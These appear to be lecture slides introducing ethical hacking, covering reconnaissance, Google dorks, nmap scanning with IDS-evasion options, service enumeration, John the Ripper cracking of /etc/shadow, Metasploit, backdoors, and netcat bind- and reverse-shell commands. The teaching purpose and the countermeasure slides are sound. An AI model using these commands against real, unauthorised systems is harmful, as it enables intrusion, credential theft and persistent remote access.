1. Dr. Igor Santos

2.  ¿What is Ethical Hacking?  Phases  Information Gathering  Network Mapping & Scanning  Password Attacks  Service Enumeration  Vulnerabilities Identification & Exploitation 2

3. ¿What is Ethical Hacking? 3

4.  A method to evaluate the security of a system or a network of systems by simulating an intruder attack  It shows the actual impact of a vulnerability through controled tests  It searchs for unknown vulnerabilities 4

5.  Information level  White Box  Black Box  ¿Social Engineering?  ¿Physical Security?  ¿Dangerous Tests?  Exploits  DoS  … 5

6. Information Gathering 6

7.  Gather information about the target before the attack  Without (too much) contact  As much information as possible  The information can be very valuable in the future  More information = More probability of success in the attack 7

8.  Information we search for:  Names and/or Positions of workers  E-mail addresses  User names  Public Addresses, Domains or URLs  Used Software and Technologies  Internal addresses or URLs  Internal PATHs  Data about the system configuration 8

9.  Client and supplier names  Physical Location  Telephone Number  …  Iterative process  When information is found, new searches are performed 9

10.  Sources  Search Engines  DNS servers  Whois servers  Metadata  Social Networks  P2P networks  … 10

11.  Passive Methods  The target is not contacted directly ▪ Search Engines ▪ Whois ▪ …  Active Methods  It leaves some trace in the target ▪ DNS zone transfer ▪ Web site Mirroring ▪ … 11

12.  Internet Service Registration (whois)  Information about IP record and maintenance  Search Engines  Gather public information from company and workers web sites 12

13.  DNS queries  Identification of hosts by DNS querying  Web site analysis  Intentionally published information, that may suppose a risk for the security 13

14.  New sources!!!  Social Networks  Metadata  P2P networks  Work searching websites 14

15.  Google Hacking: Search in Google sensitive information, usually with malicious goals  Johnny Long  Google Hacking For Penetration Testers  http://www.hackersforcharity.org/ghdb/ http://www.hackersforcharity.org/ghdb/ ▪ No mantenida  http://www.exploit-db.com/google-dorks/ http://www.exploit-db.com/google-dorks/ ▪ Continuación!!! (9 nov. 2010)  Cheat-sheet http://www.sans.org/mentor/GoogleCheatSheet.pdf 15

16.  ¿What to look for?  Vulnerable applications (e.g.,: inurl:eStore/index.cgi?)  Error Messages (e.g.,: “Warning: mysql_query()” “invalid query”)  Files with sensitive information (e.g.,: filetype:sql “insert into”)  Websites with private reports (e.g.,: intitle:”Nessus Scan Report”)  Web server versions (e.g.,: “Microsoft-IIS/* server at”, intitle:index.of) 16

17.  http://www.shodanhq.com/ http://www.shodanhq.com/  A “diferent” search engine  If finds systems by performing searches based on the banner responses ▪ Computer search engine  Filters: http://www.shodanhq.com/help/filtershttp://www.shodanhq.com/help/filters  Examples: ▪ net:130.206.139.0/24 ▪ port:22 country:ES 17

18.  Netcraft (http://news.netcraft.com)http://news.netcraft.com  It shows the following domain information given a domain ▪ OS version. ▪ Web server version ▪ Uptime 18

19.  Countermeasures  To properly configure the “robots.txt” file ▪ This file indicates to search engines what the must NOT index  Periodically audit the web site with these techniques in order to check that there is no access to sensitive information 19

20.  ¿Who does have a profile in Facebook or LinkedIn?  ¿Do we know how to handle privacity in social networks?  Social Engineering  Create a fake profile in order to obtain access to private profiles = ¡Lot of information!  Social Network Search Engines ▪ http://www.123people.com/ http://www.123people.com/ ▪ http://www.pipl.com/ http://www.pipl.com/ 20

21.  Countermeasures  Limit the presence in social networks  Don’t publish too much  Don’t publish automatically  Don’t accept every friendship request (we may not be the final victim but an attack vector) 21

22.  Hidden information regarding a document  Author  Used Application  Date of Creation  Camera Model (images)  E-mail Addresses  …  They enhance the information present in a document 22

23.  A tool that started by being a metadata extractor and analyzer, now is more than that:  Document panel: Searches several types of documents in Google, Bing and Exaled  DNS Search Panel : It uses different techniques to obtain more domain names  Countermeasures: Metashield Protector  It cleans the metadata from documents 23

24. Network Mapping & Scanning 24

25.  Several techniques  Host discovery  Port scanning  IDS (Intrusion Detection System) evasion  Service and OS identification (fingerprinting) 25

26.  Nmap  Tool for network exploration and security auditing nmap [.][ ] { }  Options ▪ Scan type: -sS, -sX, -sU, … ▪ -p : ports to scan (separated by a comma or “-” for range) (to scan all of them –p 0-65535) 26

27.  Zenmap  Front-end for nmap  It draws a network map with the results  Predefined scans 27

28.  Manual http://nmap.org/man/es/man-briefoptions.html  Cheat sheet http://sbdtools.googlecode.com/files/Nmap5% 20cheatsheet%20eng%20v1.pdf  Book http://nmap.org/book/ 28

29.  Identify online systems  First step for network mapping  Classic method using ping  ICMP echo request  Alive systems respond to ICMP echo reply  It is also possible to send TCP packets and wait for the response of the online  ARP Ping in local networks 29

30.  Nmap ping (-sP)  ICMP echo request & ICMP timestamp request  TCP ACK packet port 80  TCP SYN packet port 443  Example: nmap –sP 192.168.1.1 30

31.  One of the most widespread hacking techniques  Nmap en Hollywood http://nmap.org/movies.html  A computer executes several services that listen in tcp/udp ports  By means of scanning, we can locate open ports 31

32.  TCP Connect scan  A TCP connection is established with the destination port (Three-Way Handshake)  A very reliable method to determine the port state  Simple and easy to detect ▪ Generates too much noise nmap –sT -p 32

33.  Open port 33

34.  Closed port 34

35.  Filtered port 35

36.  SYN scan  If a port listening is found, the full connection is not established ▪ A RST is sent to finalize it  Because Three-Way Handshake is not completed, a lot of system don’t log the connection attempt  A IDS can easily detect it  Quick and realiable nmap –sS -p 36

37.  Open port 37

38.  Closed port 38

39.  Filtered port 39

40.  UDP is a protocal not connection oriented  Closed ports return the packet “ICMP destination unreachable”  If the ICMP traffic is filtered the responsed are not retrieved for the closed ports  The port state cannot be determined conclusively nmap –sU -p 40

41.  Open/Filtered port 41

42.  Closed port 42

43.  Techniques to avoid IDS/IPS  Use of fragmented packets ▪ Distribution of an IP packet between various data blocks nmap -sS -f -p  Spoofing of origin IPs to emulate multiple attackers ▪ Hiding our own IP (attacker) nmap –sS –D -p 43

44.  Service Fingerprinting  Identification of the service listening in a port TCP/UDP nmap –sV -p  O.S. Fingerprinting  Identification of the Operative System nmap –O 44

45.  Disable unnecessary services  Close ports  Firewall / IDS / IPS  ICMP traffic filtering 45

46. Enumeration 46

47.  Get information through a network service  What information?  System user names  Email addresses  other systems ... 47

48.  Services  FTP: anonymous / Ftp-user-enum  TFTP: ¡without authentication!  SMTP: VRFY y EXPN commands → smtpenum  DNS: Direct/Reverse Lookup y zone transfer  HTTP: banner grabbing  RPC: edump, rpcdump, rpcinfo  NETBIOS: samrdump  SNMP: snmpwalk, snmpheck  LDAP: Brute force by means of the Guest user 48

49.  Maintain the services updated  Disable unnecessary services 49

50.  ATAQUES A CONTRASEÑAS Passwords Attacks 50

51.  It is unknown some or all the necessary data to authenticate  User (if the Information Gathering phase has been correctly done, we will have several system users)  Password  The password file is known, but it is encrypted  Words are test until the correct one is found 51

52.  Systems store a password Hash  They do not store clear users' passwords  One-way encryption function  It cannot be decrypted ▪ http://en.wikipedia.org/wiki/Cryptographic_hash_functi on http://en.wikipedia.org/wiki/Cryptographic_hash_functi on 52

53.  During a pentest we will collect password hashes  Bad configurations  Successful intrusion  With administrative permission is possible to dump the hashes of the passwords of system users  Windows -> SAM  Unix -> / etc / passwd, / etc / shadow 53

54.  Dictionary  It is based on a list of user names or passwords  Common Words  Terms related to the audited  Try until the right one is found  It should be on the list!  Success depends on how good and / or extensive is the dictionary  / pentest / passwords / wordlists 54

55.  Hybrid  It uses a dictionary, but variations are also introduced  Examples  Try dictionary words in lowercase and uppercase  A is changed by 4, S by 5, E by 3,... 55

56.  Brute Force  Usernames or passwords are generated within a rank and given a character set ▪ Eg max 8 characters [A-Za-z] 56

57.  Password cracking tool  Able to break several algorithms  DES  MD5  SHA-1  LM (Lan Manager) ...  You can save a session for later cracking 57

58.  Single mode  Quick test  Difficult to have success  It uses typical passwords and some variations john --single 58

59.  Wordlist Mode  It tests with a dictionary file  Quick  Hybrid attack: --rules john --wordlist=  Dictionaries /pentest/passwords/wordlists/ 59

60.  Incremental Mode  It tries all possible combinations of passwords (Brute Force) ▪ Only letters (--incremental:alpha) ▪ Only numbers (--incremental:digits) ▪ Letters, numbers and some special characters (--incremental:lanman) ▪ All characters (--incremental:all) john --incremental:[mode] 60

61.  Show cracked hashes  john --show /etc/shadow 61

62.  Shoulder surffing  Social Engineering  Sniffing  Capture the session logins  Physical access  Bypass -> konboot  Password cracking 0phcrack live cd (Rainbow Tables) 62

63. Vulnerabilities Identification & Exploitation 63

64.  Terminology  Vulnerability  Exploit (client-side, server-side, …)  0-day exploit  Payload  CVE (Common Vulnerabilities and Exposures): http://cve.mitre.org/ http://cve.mitre.org/ 64

65.  Lots of vulnerabilities types:  Configuration (not design)  Input validation  Directory Jump  Command Injection  SQL Injection  Cross-site scripting (XSS)  Buffer overflow  … 65

66.  Vulnerability Search  Security Focus ▪ http://www.securityfocus.com/vulnerabilities http://www.securityfocus.com/vulnerabilities  National Vulnerability Database ▪ http://web.nvd.nist.gov/view/vuln/search http://web.nvd.nist.gov/view/vuln/search  CERT ▪ http://cert.inteco.es/vulnSearch/Current_News/Vulnerabilitie s_1/vulnerability_search/?postAction=getVulns http://cert.inteco.es/vulnSearch/Current_News/Vulnerabilitie s_1/vulnerability_search/?postAction=getVulns  Microsoft Security Bulletins ▪ http://www.microsoft.com/spain/technet/security/bulletin/ms 10-oct.mspx http://www.microsoft.com/spain/technet/security/bulletin/ms 10-oct.mspx  Scanners: Secunia, Nessus, etc. 66

67.  Exploits Search  Exploit Database ▪ Milw0rm continuation. ▪ http://www.exploit-db.com/ http://www.exploit-db.com/  Others ▪ http://www.securiteam.com/exploits http://www.securiteam.com/exploits ▪ http://securityvulns.com/exploits http://securityvulns.com/exploits ▪ http://www.web-hack.ru/exploit http://www.web-hack.ru/exploit ▪ http://tarantula.by.ru/localroot http://tarantula.by.ru/localroot 67

68.  Metasploit  Framework for vulnerbility explotation  It help in the development of new exploits  It allows to define ▪ What exploit is going to be used ▪ Which payload is going to be launched lanzará ▪ Meterpreter: advanced payload without disk access (DLL Injection) → less forensics evidences. ▪ How is going to be coded (avoiding IDS, etc.) 68

69.  Mantaining the access– Backdoors  Tiny Shell: Unix backdoor  Hydrogen: backdoor from Immunitysec ▪ It includes robust encryption and traffic hiding  Radmin: Windows backdoor ▪ A remote desktop like connection. Very easy to use and with a lot of functions 69

70.  Netcat: it can be used as backdoor ▪ Victim (server): nc -lp 4444 –e cmd.exe ▪ Attacker (client): nc –vv 4444 ▪ Also “reverse shell”: ▪ Attacker (client): nc –vvlp 4444 ▪ Victim (server): nc –vv 4444 –e cmd.exe 70

71.  Images  RTVE  http://www.flickr.com/photos/anonymous9000/2663311366 http://www.flickr.com/photos/anonymous9000/2663311366  The Matrix, Warner Bros.  http://www.flickr.com/photos/venosdale/4412225367 http://www.flickr.com/photos/venosdale/4412225367  http://www.flickr.com/photos/melancon/2283719035 http://www.flickr.com/photos/melancon/2283719035 71